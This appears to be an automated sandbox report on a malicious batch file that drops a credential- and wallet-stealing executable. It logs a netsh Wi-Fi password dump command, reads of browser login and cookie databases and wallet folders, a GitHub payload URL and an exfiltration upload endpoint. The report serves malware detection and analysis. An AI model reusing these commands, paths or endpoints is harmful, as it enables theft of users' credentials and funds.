    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\ProgramData\QQQ\NVIDIAS.exe VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.39.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
    Source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: Amcache.hve.LOG1.39.dr, Amcache.hve.39.drBinary or memory string: MsMpEng.exe
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\walletst-
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.00000000035E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.00000000035E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus`,
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: Yara matchFile source: Process Memory Space: NVIDIAS.exe PID: 716, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts841
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    211
    Disable or Modify Tools
    1
    OS Credential Dumping
    1
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    11
    Process Injection
    2
    Obfuscated Files or Information
    LSASS Memory155
    System Information Discovery
    Remote Desktop Protocol2
    Data from Local System
    11
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    PowerShell
    1
    Services File Permissions Weakness
    1
    Services File Permissions Weakness
    1
    Software Packing
    Security Account Manager1051
    Security Software Discovery
    SMB/Windows Admin Shares1
    Email Collection
    11
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Timestomp
    NTDS65
    Virtualization/Sandbox Evasion
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets3
    Process Discovery
    SSHKeylogging14
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Masquerading
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Modify Registry
    DCSync1
    System Network Configuration Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job65
    Virtualization/Sandbox Evasion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
    Process Injection
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Services File Permissions Weakness
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576243 Sample: 3gJQoqWpxb.bat Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 68 247.106.0.0.in-addr.arpa 2->68 70 raw.githubusercontent.com 2->70 72 2 other IPs or domains 2->72 88 Suricata IDS alerts for network traffic 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 Sigma detected: Capture Wi-Fi password 2->92 94 3 other signatures 2->94 10 cmd.exe 2 2->10         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 96 Suspicious powershell command line found 10->96 98 Uses cmd line tools excessively to alter registry or file data 10->98 100 Adds a directory exclusion to Windows Defender 10->100 16 NVIDIAS.exe 15 29 10->16         started        20 powershell.exe 27 10->20         started        22 powershell.exe 7 10->22         started        24 16 other processes 10->24 74 127.0.0.1 unknown unknown 13->74 signatures6 process7 dnsIp8 60 89.23.100.233, 1490, 49710 MAXITEL-ASRU Russian Federation 16->60 62 icanhazip.com 104.16.184.241, 49709, 80 CLOUDFLARENETUS United States 16->62 76 Antivirus detection for dropped file 16->76 78 Multi AV Scanner detection for dropped file 16->78 80 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 16->80 86 14 other signatures 16->86 27 cmd.exe 1 16->27         started        30 cmd.exe 16->30         started        32 cmd.exe 16->32         started        34 WerFault.exe 16->34         started        82 Loading BitLocker PowerShell Module 20->82 36 WmiPrvSE.exe 20->36         started        84 Powershell drops PE file 22->84 64 github.com 140.82.113.4, 443, 49707 GITHUBUS United States 24->64 66 raw.githubusercontent.com 185.199.108.133, 443, 49708 FASTLYUS Netherlands 24->66 58 C:\ProgramData\QQQ58VIDIAS.exe, PE32 24->58 dropped file9 signatures10 process11 signatures12 102 Uses netsh to modify the Windows network and firewall settings 27->102 104 Tries to harvest and steal WLAN passwords 27->104 38 conhost.exe 27->38         started        40 tasklist.exe 27->40         started        42 conhost.exe 30->42         started        44 chcp.com 30->44         started        46 netsh.exe 30->46         started        48 findstr.exe 30->48         started        50 conhost.exe 32->50         started        52 chcp.com 32->52         started        54 2 other processes 32->54 process13 process14 56 WerFault.exe 42->56         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    3gJQoqWpxb.bat8%ReversingLabsWin32.Coinminer.Generic
    SourceDetectionScannerLabelLink
    C:\ProgramData\QQQ\NVIDIAS.exe100%AviraHEUR/AGEN.1309950
    C:\ProgramData\QQQ\NVIDIAS.exe100%Joe Sandbox ML
    C:\ProgramData\QQQ\NVIDIAS.exe71%ReversingLabsWin32.Trojan.Jalapeno
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://89.23.100.233:1490/upload0%Avira URL Cloudsafe
    http://crl.ver)0%Avira URL Cloudsafe
    http://89.23.100.233:1490/uploadt0%Avira URL Cloudsafe
    http://upx.sf.net0%Avira URL Cloudsafe
    http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
    http://89.23.100.233:14900%Avira URL Cloudsafe
    http://www.quovadis.bm00%Avira URL Cloudsafe
    https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    github.com
    140.82.113.4
    truefalse
      high
      raw.githubusercontent.com
      185.199.108.133
      truefalse
        high
        icanhazip.com
        104.16.184.241
        truefalse
          high
          247.106.0.0.in-addr.arpa
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/pr0niums/Repo/refs/heads/main/NVIDIAS.exefalse
              high
              http://icanhazip.com/false
                high
                http://89.23.100.233:1490/uploadtrue
                • Avira URL Cloud: safe
                unknown
                https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exefalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://beta.visualstudio.net/net/sdk/feedback.aspNVIDIAS.exe, 00000015.00000002.1225165858.0000000070701000.00000020.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabNVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drfalse
                    high
                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchNVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drfalse
                      high
                      https://duckduckgo.com/ac/?q=tmp44F6.tmp.dat.21.drfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoNVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.drfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp44F6.tmp.dat.21.drfalse
                            high
                            http://crl.ver)svchost.exe, 0000001F.00000002.2120814233.0000020FFFE43000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://upx.sf.netAmcache.hve.39.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.ecosia.org/newtab/NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drfalse
                              high
                              https://ac.ecosia.org/autocomplete?q=tmp44F6.tmp.dat.21.drfalse
                                high
                                https://www.google.comNVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icoNVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drfalse
                                    high
                                    https://g.live.com/odclientsettings/Prod/C:edb.log.31.drfalse
                                      high
                                      http://89.23.100.233:1490NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drfalse
                                        high
                                        http://89.23.100.233:1490/uploadtNVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.quovadis.bm0svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://icanhazip.comNVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ocsp.quovadisoffshore.com0svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp44F6.tmp.dat.21.drfalse
                                              high
                                              https://gemini.google.com/app?q=tmp44F6.tmp.dat.21.drfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                140.82.113.4
                                                github.comUnited States
                                                36459GITHUBUSfalse
                                                89.23.100.233
                                                unknownRussian Federation
                                                48687MAXITEL-ASRUtrue
                                                104.16.184.241
                                                icanhazip.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                185.199.108.133
                                                raw.githubusercontent.comNetherlands
                                                54113FASTLYUSfalse
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1576243
                                                Start date and time:2024-12-16 17:25:45 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 27s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                Run name:Suspected VM Detection
                                                Number of analysed new started processes analysed:48
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:3gJQoqWpxb.bat
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winBAT@66/35@4/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 248
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 23.197.170.163, 20.190.135.16
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
